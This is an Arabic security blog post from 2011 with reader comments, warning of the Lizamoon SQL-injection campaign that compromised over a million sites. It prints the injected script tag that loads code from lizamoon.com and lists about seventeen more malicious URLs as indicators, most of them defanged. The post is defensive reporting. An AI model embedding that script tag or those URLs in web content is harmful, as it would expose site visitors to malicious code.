تحذير من دودة Lizamoon
الكاتب: بشار | يوم: 31 مارس, 2011 | التعليقات: 4 | القراءات: - عدد المشاهدات 7٬099
اصدرت شركة Websense تحذيراً من دودة Lizamoon والتي بدأت بالانتشار بشكل متسارع حيث تقوم باستغلال ثغرة لحقن كود في المواقع يشير الى موقع lizamoon.com والذي سمّيت الدودة باسمه.
الكود الذي يحقن في المواقع هو
<script src=hxxp://lizamoon.com/ur.php></script>
يمكن الاطلاع على عدد المواقع المحقونة باستخدام غوغل
مثال على موقع مصاب
تحديث (٣-٤-٢٠١١): ارتفع عدد المواقع المصابة إلى أكثر من مليون موقع مما يجعل هذه الدودة من اكثر المتسببين في اصابات مواقع إن لم تكن أكثرهم. المواقع المصابة تستخدم MS SQL 2000 أو MS SQL 2005.
صحيح أن الدودة بدأت بحقن المواقع بكود يؤشر الى موقع lizamoon إلا أنّ هذا النّطاق هو أحد النّطاقات التي تستخدمه الدودة وليس الوحيد. هنا قائمة أوّليّة بالمواقع الأخرى:
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats48.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://stats-master11.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://extra-service.info/ur.php
http://sol-stats.info/ur.php
بشار ماجستير نظم معلومات. مهندس أنظمة يمتلك خبرة في إدارة أنظمة ويندوز ولينكس. باحث ومختصص في مجال أنظمة المعلومات، معالجة الحوادث الأمنيّة، تحليل الإختراقات الأمنيّة، وفحصوصات الاختراق. حاصل على العديد من الشهادات الأمنيّة. عضو في مجلس استشاريّي معهد سانز لأمن المعلومات.
التعليقات:
اترك تعليقاً | عدد التعليقات: (4)
السلام عليكم
شكرا لك أخي بشار
هل هكدا يكتب الكود أخي
أقصد hXXp !
و شكرا على مجهوداتكم أخي
لا أخي، هذا فقط حتى لا يتفعل الرّابط ويضغط عليه الزّائر خصوصاً أن الموقع المعني مشبوه بأنّه موقع هجومي.
يبدوا أنها تستغل ثغرة sql injection في احد تطبيقات asp , aspx وتحقن هذا الرابط عن طريقها. الغريب ان الرابط ﻻحياة فيه :
$ ping -c 1 www.lizamoon.com
ping: unknown host www.lizamoon.com
وهذا منذ أن قرأت الخبر
أخي بركات كلامك سليم بخصوص موقع lizamoon فهذا الموقع تمّ إغلاقه. ولكن هناك مواقع أخرى يتمّ حقنها. تمّ تحديث المقال بمعلومات إضافية حولها.